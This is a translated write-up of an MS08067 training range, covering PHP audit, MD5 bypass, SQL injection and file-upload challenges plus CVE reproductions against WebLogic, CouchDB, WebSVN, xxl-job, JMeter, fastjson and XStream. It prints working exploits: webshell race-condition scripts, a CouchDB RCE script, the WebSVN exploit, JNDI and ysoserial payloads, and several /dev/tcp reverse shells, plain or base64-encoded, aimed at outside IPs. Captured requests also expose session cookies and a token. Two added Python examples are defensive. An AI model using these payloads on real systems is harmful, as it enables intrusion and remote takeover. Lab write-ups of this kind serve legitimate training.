MS08067 Training Range -- Write-up

Published: 2025-02-12

Disclaimer: This article is for learning and research purposes only and does not encourage or support any illegal activity. All technical content is intended solely for personal skill improvement and must not be used, without authorization, to attack, intrude on or damage other people's systems. We accept no responsibility for any legal liability or loss arising from the use of this content.

Note: this article is a quick run-through; the methods are incomplete, and the details still need further reading of the referenced write-ups.


Overall the challenges are fairly easy, mostly CVE reproductions. Thanks to @A.M.~ for the large contribution to this write-up.


Contents

References:

Exam simulation

1 PHP code audit

2 Path traversal

3 Log file inclusion

4 MD5 loose comparison

5 MD5 strict comparison

6 Login form - password brute force

7 Login form - universal password

8 Login form - SQL injection

File upload scenarios

upload1 -- front-end JS check

2 - .htaccess bypass

3 - MIME check (server side)

4 - File header + MIME

5 - Extension deletion

6 - Extension replacement

7 - %00 truncation

8 - Null byte truncation

9 - Blacklist bypass

10 - Race condition

11 - Image re-rendering

12 - /. suffix-check bypass

13 - Array bypass

VIP

2014-4210 (WebLogic weak password plus upload)

junams

drupal

yapi

2018-1273

CouchDB

Websvn

Nostromo

xxl-job

jmeter

fastjson

xstream ???

log4j2 ????

Scenario ranges

Mirror site

CodeExec

API function

Redis ????

redis guess

PUT

XXE

Pretty hard! ???

WEB

52

redis-Lua

flink

weblogic

SpringFramework

L4 ???

ZenTao CMS

cve-2019-9978

Tomcat (猫咪) & cve-2020-13935 (duplicate challenge)


References:

360 Phone N6 Pro kernel vulnerability - Wiki

seacms:

[Vulnerability reproduction - seaCms command execution] vulfocus/seacms-cnvd_2020_22721_cnvd-2020-22721 - CSDN blog


Exam simulation

1 PHP code audit

MS08067喊你来找Flag了
your key: 
 
<title>CheckMe-01</title>
<?php
print("<h1>MS08067喊你来找Flag了</h1>");
?>
<form action="index.php" method="POST">
  your key: <input type="text" name="key" />
  <input type="submit" value="Submit" />
</form>
<?php
if(!empty($_POST['key'])){
    $keys = $_POST['key'];
    show_source("index.php");
    $keys = base64_decode(urldecode($keys));
    if(strlen($keys)==6){
        if($keys=="ctfctf"){
            print("<p>You win!</p>");
            include("flag.php");
            print($flag);
        }
    }
    else{
        print("末心:大漏特漏!此乃九年义务教育漏网之鱼。");
    }
}
?>

Y3RmY3Rm (base64 of "ctfctf": the check decodes the submitted key and compares the 6-byte result with "ctfctf")


2 Path traversal

欢迎来到CheckMe-02,快来寻找你的Flag并提交吧。
flag{6de32f81-5388-4baa-a7a3-01f1d0d4ece0} <?php include($_GET['url']);?>


3 Log file inclusion

<?php include($_GET['text']);?>

Include the log file --- webshell

env

set


4 MD5 loose comparison

<?php
$flag = "";
$a = $_GET["a"];
$b = $_GET["b"];
if (isset($a) && isset($b)) {
    if (!ctype_alpha($a)) {
        die("a error");
    }
    if (!is_numeric($b)) {
        die("b error");
    }
    if (md5($a) == md5($b)) {
        echo $flag;
    }
} else {
    echo "请问,flag在哪里?";
}
?>

MD5 loose comparison

Summary of MD5 bypass tricks in CTF_ctf md5 bypass - CSDN blog

a must consist of letters only

b must be a number


5 MD5 strict comparison

MD5 strict-type bypass

<?php
$a = $_GET["a"];
$b = $_GET["b"];
if ($a !== $b && md5($a) === md5($b)) {
    echo($flag);
}
?>
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
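The checks in sections 4 and 5 fail for two different reasons, and the difference is easiest to see in code. The following is an added example in Python, not code from this write-up: it emulates PHP's loose `==` on two MD5 hex digests, shows why a strict comparison (`===` or hash_equals()) stops the "magic hash" trick, and then shows that the strict form is still satisfiable by a genuine MD5 collision. The inputs QNKCDZO and 240610708 are well-known magic-hash values that are not on this page; the 64-byte collision pair is the payload from section 5 above, decoded from its URL-encoded form.

```python
import hashlib
import hmac
import re

# PHP calls a string "numeric" when it parses as an integer or float, which
# includes scientific notation such as "0e123..." (= 0 * 10**123 = 0.0).
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")
_ALPHA = re.compile(r"^[A-Za-z]+$")  # what ctype_alpha() accepts


def php_is_numeric(s: str) -> bool:
    return bool(_PHP_NUMERIC.match(s))


def php_loose_equal(x: str, y: str) -> bool:
    """Emulate PHP `==` on two strings: when both are numeric strings they are
    compared as numbers (true in PHP 7 and PHP 8 alike), otherwise byte for byte."""
    if php_is_numeric(x) and php_is_numeric(y):
        return float(x) == float(y)
    return x == y


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def weak_check(a: str, b: str) -> bool:
    """Section 4: a alphabetic, b numeric, then md5($a) == md5($b)."""
    if not _ALPHA.match(a) or not php_is_numeric(b):
        return False
    return php_loose_equal(md5_hex(a.encode()), md5_hex(b.encode()))


def strict_check(a: str, b: str) -> bool:
    """Hardened form: compare the digests as opaque strings (PHP `===` or
    hash_equals()), so two "0e..." digests no longer both collapse to 0.0."""
    if not _ALPHA.match(a) or not php_is_numeric(b):
        return False
    return hmac.compare_digest(md5_hex(a.encode()), md5_hex(b.encode()))


# Well-known "magic hash" inputs: both MD5 hex digests match 0e[0-9]+.
MAGIC_ALPHA = "QNKCDZO"
MAGIC_NUMERIC = "240610708"

# The two 64-byte inputs from section 5 (they differ in two bytes),
# decoded from their URL-encoded form; they are a genuine MD5 collision.
COLLISION_A = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2")
COLLISION_B = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2")


def strict_check_bytes(a: bytes, b: bytes) -> bool:
    """Section 5: `$a !== $b && md5($a) === md5($b)`. Only distinct inputs with
    byte-identical digests pass, i.e. a real collision, which MD5 no longer
    resists. The fix is a collision-resistant hash (SHA-256) kept under `===`."""
    return a != b and hashlib.md5(a).digest() == hashlib.md5(b).digest()


def sha256_check_bytes(a: bytes, b: bytes) -> bool:
    """The same logic with SHA-256: the MD5 collision pair no longer satisfies it."""
    return a != b and hashlib.sha256(a).digest() == hashlib.sha256(b).digest()


if __name__ == "__main__":
    print("loose == on magic hashes :", weak_check(MAGIC_ALPHA, MAGIC_NUMERIC))
    print("strict === on magic hashes:", strict_check(MAGIC_ALPHA, MAGIC_NUMERIC))
    print("MD5 collision passes ===  :", strict_check_bytes(COLLISION_A, COLLISION_B))
    print("SHA-256 with same inputs  :", sha256_check_bytes(COLLISION_A, COLLISION_B))
```

The first two functions are the two challenge checks; the last two show that switching `==` to `===` closes section 4 but leaves section 5 open as long as the hash is MD5, so the real fix is the hash function, not only the comparison operator.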


6 Login form - password brute force

admin

Password: xxxxxxxxx (all digits)

Just brute-force the password.


7 Login form - universal password

Universal password

admin'#

Any password will do


8 Login form - SQL injection

sqlmap, POST request, time-based blind


File upload scenarios

Source: the Guoguang (国光) file upload range

1-13

Guoguang file upload range WriteUp | lololowe's blog

upload1 -- front-end JS check

Just get past the front-end JS check


function checkfilesuffix()
{
    var file=document.getElementsByName('file')[0]['value'];
    if(file==""||file==null)
    {
        swal("请添加上传文件", "", "error");
        return false;
    }
    else
    {
        var whitelist=new Array(".jpg",".png",".gif",".jpeg");
        var file_suffix=file.substring(file.lastIndexOf("."));
        if(whitelist.indexOf(file_suffix) == -1)
        {
            swal("只允许上传图片类型的文件!", "", "error");
            return false;
        }
    }
}

function error(){
    swal("上传失败", "", "error");
}

Disable JS and upload the php file directly, or upload it with a .jpg suffix, intercept the request and change jpg to php; that is enough to pass the front-end check.


2 - .htaccess bypass

Challenge: blacklist

.htaccess is a configuration file specific to the Apache server, enabled by default, used to configure Apache; see this article for details: https://xz.aliyun.com/t/8267?time__1311=n4%2BxnD0Dc7exyDjxYqGNWP4IrVnuYA5GCzReD

The .htaccess directive we can use is AddHandler (SetHandler also works but is a little longer; see the article above). It binds a given file extension to a given MIME type, e.g. binding .jpg to application/x-httpd-php, so that when Apache serves a .jpg file it parses it as PHP.

Upload .htaccess:
# treat .phps .php3p .png .jpg .gif as PHP files
AddType application/x-httpd-php .phps .php3p .png .jpg .gif

Then upload shell.jpg or similar and it is parsed as PHP.


3 - MIME check (server side)

image/jpeg
image/png
image/gif
image/jpg

Upload shell.php, intercept it in Burp and change the MIME type from application/octet-stream to image/jpeg; the upload succeeds:
Or upload shell.jpg (== image/jpg) and change the suffix to php.


4 - File header + MIME

MIME types:
image/jpeg
image/jpg
image/png
image/gif

File headers (magic bytes) and the formats they belong to:
89504E47  --  .png
FFD8FFE0  --  .jpg
47494638  --  .gif

copy pic.png/b + shell.php/a shell.png
Image webshell (an image with PHP appended)


5 - Extension deletion

shell.php ---> shell.

shell.phphpp --> shell.php

6 - Extension replacement

shell.pphphp ---> shell.p hp (the middle "php" is removed, and the surrounding "p" and "hp" join up into "php")

shell.PHP


7 - %00 truncation

8 - Null byte truncation

%00, then URL-decode it


9 - Blacklist bypass

shell.php5


10 - Race condition

payload

<?php fputs(fopen('shell.php','w'),'<?php eval($_REQUEST[1]);?>');?>

<?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>

# coding:utf-8
import requests
from concurrent.futures import ThreadPoolExecutor


def td(list):
    url = 'http://110.42.47.105:17373'
    file = {'upload_file': (
        'szm.php', "<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[1]);?>'); ?>")}
    data = {'submit': 'Upload'}
    r = requests.post(url=url, data=data, files=file)
    re = requests.get('http://110.42.47.105:17373/upload/shell.php')
    if re.status_code == 200:
        print('上传成功')


if __name__ == '__main__':
    with ThreadPoolExecutor(20) as p:
        p.map(td, range(200000))

        



11 - Image re-rendering

http://110.42.47.105:17953/?file=./upload/1946210678.gif

gif


12 - /. suffix-check bypass


13 - Array bypass

copy 1.jpg/b+2.php 3.jpg

This challenge is mainly a code audit: MIME validation + whitelist + attacker-controlled upload path.
Source code:
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    // check the MIME type
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        // check the file name
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}



For example, uploading upload.php.jpg
produces the array
array(3){
[0]=>upload,
[1]=>php,
[2]=>jpg
} --> the check only looks at whether the last element of the array is in the whitelist
So an array can be constructed whose last element is a whitelisted suffix ('jpg','png','gif'): end($file) is what gets checked, but the stored name is rebuilt from reset($file) and $file[count($file) - 1], which for a sparse array is not the same element.
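Each of the thirteen upload bypasses above defeats one check taken in isolation. As an added example, not code from the range or from this write-up, here is a Python server-side validator that applies the relevant checks together, with each rule tagged with the challenge number it blocks. The magic bytes are the file headers from section 4; the rest of the design (rejecting non-string names, a random stored name chosen only after all checks pass, storage outside the web root) is assumed here rather than taken from the original source.

```python
import secrets
from typing import Any, Tuple

# Extension -> (canonical MIME type, magic bytes). The magic bytes are the
# file headers listed in section 4 (89504E47, FFD8FF.., 47494638).
ALLOWED = {
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png":  ("image/png",  b"\x89PNG"),
    "gif":  ("image/gif",  b"GIF8"),
}


def validate_upload(name: Any, declared_mime: str, head: bytes) -> Tuple[bool, str]:
    """Return (True, stored_name) or (False, reason).

    Each rule carries the number of the upload challenge it defeats.
    """
    # 13: array bypass. A file name is a plain string, nothing else.
    if not isinstance(name, str):
        return False, "name must be a string"
    # 7/8: %00 / NUL truncation; 12: "/." and any other path component.
    if "\x00" in name or "/" in name or "\\" in name:
        return False, "illegal character in name"
    # 5/12: trailing dots or spaces that some file systems silently strip.
    if not name or name != name.rstrip(". "):
        return False, "trailing dot or space"
    # 5/6/9: classify by the text after the LAST dot, lower-cased, against a
    # whitelist. Never delete or replace substrings (that is what turns
    # shell.pphphp into shell.php) and never use a blacklist (php5, phtml, ...).
    stem, dot, ext = name.rpartition(".")
    ext = ext.lower()
    if not dot or not stem or ext not in ALLOWED:
        return False, "extension not allowed"   # also rejects ".htaccess" (2)
    mime, magic = ALLOWED[ext]
    # 3: Content-Type is attacker-controlled, but it still has to agree.
    if declared_mime.lower() != mime:
        return False, "declared MIME does not match extension"
    # 4: the header has to agree too. A polyglot (copy pic.png/b + shell.php/a)
    # passes this test, so the remaining defences are structural: a random
    # server-side name, storage outside the web root, and re-encoding (11).
    if not head.startswith(magic):
        return False, "file header does not match extension"
    # 10: the stored name is generated only after every check passed, so there
    # is no window in which a rejected file is reachable under a guessable name.
    return True, f"{secrets.token_hex(16)}.{ext}"


# Constructed inputs: (name, declared MIME, first bytes, expected verdict).
CASES = [
    ("cat.png",            "image/png",  b"\x89PNG\r\n\x1a\n", True),
    ("shell.php",          "image/jpeg", b"\xff\xd8\xff",      False),  # 1/3
    (".htaccess",          "image/jpeg", b"\xff\xd8\xff",      False),  # 2
    ("shell.png",          "image/png",  b"<?php ",            False),  # 4
    ("shell.php.",         "image/jpeg", b"\xff\xd8\xff",      False),  # 5
    ("shell.PHP",          "image/jpeg", b"\xff\xd8\xff",      False),  # 6
    ("shell.php\x00.jpg",  "image/jpeg", b"\xff\xd8\xff",      False),  # 7/8
    ("shell.php5",         "image/jpeg", b"\xff\xd8\xff",      False),  # 9
    ("shell.php/.",        "image/jpeg", b"\xff\xd8\xff",      False),  # 12
    (["shell.php", "jpg"], "image/jpeg", b"\xff\xd8\xff",      False),  # 13
    ("photo.php.jpg",      "image/jpeg", b"\xff\xd8\xff",      True),   # stored as <random>.jpg
]


def run_cases() -> bool:
    """True when every constructed case gets the expected verdict."""
    return all(validate_upload(n, m, h)[0] == want for n, m, h, want in CASES)


if __name__ == "__main__":
    for n, m, h, want in CASES:
        ok, info = validate_upload(n, m, h)
        print(f"{str(n)!r:28} -> {'ACCEPT' if ok else 'REJECT'}: {info}")
```

The last case is accepted on purpose: a multi-extension name is harmless once the stored name is random and ends in the whitelisted extension, and the page's .htaccess trick (section 2) is covered on the server side by keeping the upload directory outside the document root rather than by the validator.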


VIP

2014-4210 (WebLogic weak password plus upload)

WebLogic vulnerability reproduction: SSRF (CVE-2014-4210); the flag is in an environment variable

WebLogic SSRF vulnerability (CVE-2014-4210) reproduction - Bilibili

/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.1:6379

weblogic

SSRF ????? bot! I really did not know the internal IP.

Weak password + webshell:

Weak password: weblogic / Oracle@123

Rough upload procedure: Pentesting - deploying a WAR webshell from the WebLogic console_creating a WAR webshell - CSDN blog

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload

Once the upload succeeds, visit /21/21.jsp and connect to the webshell.


junams

junams file upload (CNVD-2020-24741) reproduction - CSDN blog


drupal

Drupal remote code execution (CVE-2019-6339) simple reproduction - Mke2fs - cnblogs

Drupal remote code execution vulnerability (CVE-2019-6339)

Goby solved it instantly

yapi

YAPI is a visual API management tool developed by the Qunar mobile architecture group (YMFE, a large front-end team made up of FE, iOS and Android engineers). It is a locally deployable API management platform that connects front end, back end and QA. When YAPI is exposed on the public internet with open registration, an attacker can register an account and then execute arbitrary commands.

Software, API, RCE

YApi Mock remote code execution vulnerability


2018-1273

Goby solved it instantly

Description: Spring Expression Language is a powerful expression language that supports querying and manipulating an object graph at runtime. An attacker can, without authorization, inject crafted request parameters into a vulnerable server and achieve remote code execution.

CouchDB

Apache CouchDB is an open-source database focused on ease of use and on being "a database that completely embraces the web". It is a NoSQL database that uses JSON as its storage format, JavaScript as its query language, and MapReduce and HTTP as its API. It is widely used, e.g. by the BBC for its dynamic content platform, by Credit Suisse for the market framework of its internal commodities department, and by Meebo for its social platform (web and apps).


EXP:
#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth

target = 'http://your-ip:5984'
command = rb"""sh -i >& /dev/tcp/10.0.0.1/443 0>&1"""
version = 1

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))

session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

Websvn

WebSVN is an online Subversion repository browser. Versions before WebSVN 2.6.1 are vulnerable: insufficient filtering of the search.php?search= parameter leads to RCE.


EXP:
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305
 
import requests
import argparse
from urllib.parse import quote_plus
 
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/9999 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
 
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
 
args = parser.parse_args()
 
if args.target.startswith("http://") or args.target.startswith("https://"):
    target = args.target
else:
    print("[!] Target should start with either http:// or https://")
    exit()
 
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
 
print("[*] Request send. Did you get what you wanted?")

Nostromo

Script: GitHub - jas502n/CVE-2019-16278: Directory transversal to remote code execution

./CVE-2019-16278.sh <IP address> <port> id


xxl-job

xxl-job remote command execution reproduction_xxljob vulnerability - CSDN blog

POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=pqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace=0|0; PHPSESSID=j49mvsid608froa0gcftn8euoe; login_auto=YXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num=0; eth0_time=1737625442; eth0=566.285; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type: application/x-www-form-urlencoded

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "echo 'bash -i >& /dev/tcp/39.105.154.133/9090 0>&1' > /tmp/1.sh",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}




POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=pqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace=0|0; PHPSESSID=j49mvsid608froa0gcftn8euoe; login_auto=YXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num=0; eth0_time=1737625442; eth0=566.285; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type: application/x-www-form-urlencoded

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "chmod +x /tmp/1.sh",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}



POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=pqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace=0|0; PHPSESSID=j49mvsid608froa0gcftn8euoe; login_auto=YXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num=0; eth0_time=1737625442; eth0=566.285; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type: application/x-www-form-urlencoded

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "/bin/bash /tmp/1.sh",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}




Start a listener --- the shell comes back.

jmeter

JMeter RMI deserialization command execution vulnerability

Tool:

GitHub - Y4er/ysoserial: a modified ysoserial that mainly changes ysoserial.payloads.util.Gadgets.createTemplatesImpl so that commands, memory shells and deserialization echo can be delivered by loading a custom class.

https://github.com/Y4er/ysoserial

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 'touch /tmp/success'
Reverse shell:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}"



fastjson

Fastjson vulnerability reproduction - kar3a - cnblogs

GitHub - mbechler/marshalsec

Create the malicious class (with the reverse shell)

javac ----> .class

Start an HTTP server

Start the RMI server with the tool, listening on port 9999

Send the request, catch the reverse shell, done.

curl http://27.25.151.24:28493/ -H "Content-Type: application/json" --data '{"name":"karsa", "age":22}'



// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/39.105.154.133/6666 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}


java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://39.105.154.133:1337/#TouchFile" 9999



POC:
POST / HTTP/1.1
Host: 27.25.151.24:26795
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://39.105.154.133:9999/TouchFile",
        "autoCommit":true
    }
}

xstream ???

CVE-2021-29505 XStream remote code execution reproduction

CVE-2021-21351: a brief analysis of the XStream deserialization RCE

XStream deserialization reproduction - Arrest - cnblogs

/bin/bash -i>& /dev/tcp/39.105.154.133/9090 0>&1

L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvOTA5MCAwPiYx

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"



POST / HTTP/1.1
Host: 192.168.50.129:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 1675

<java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> <parsedMessage>true</parsedMessage> <soapVersion>SOAP_11</soapVersion> <bodyParts/> <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> <attachmentsInitialized>false</attachmentsInitialized> <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> <names> <string>aa</string> <string>aa</string> </names> <ctx> <environment/> <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> <java.rmi.server.RemoteObject> <string>UnicastRef</string> <string>39.105.154.133</string> <int>4444</int> <long>0</long> <int>0</int> <long>0</long> <short>0</short> <boolean>false</boolean> </java.rmi.server.RemoteObject> </registry> <host>39.105.154.133</host> <port>4444</port> </ctx> </candidates> </aliases> </nullIter> </sm> </message> </value> </javax.naming.ldap.Rdn_-RdnEntry> </java.util.PriorityQueue> </java.util.PriorityQueue>





POST / HTTP/1.1
Host: 27.25.151.24:27172
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Upgrade-Insecure-Requests: 1
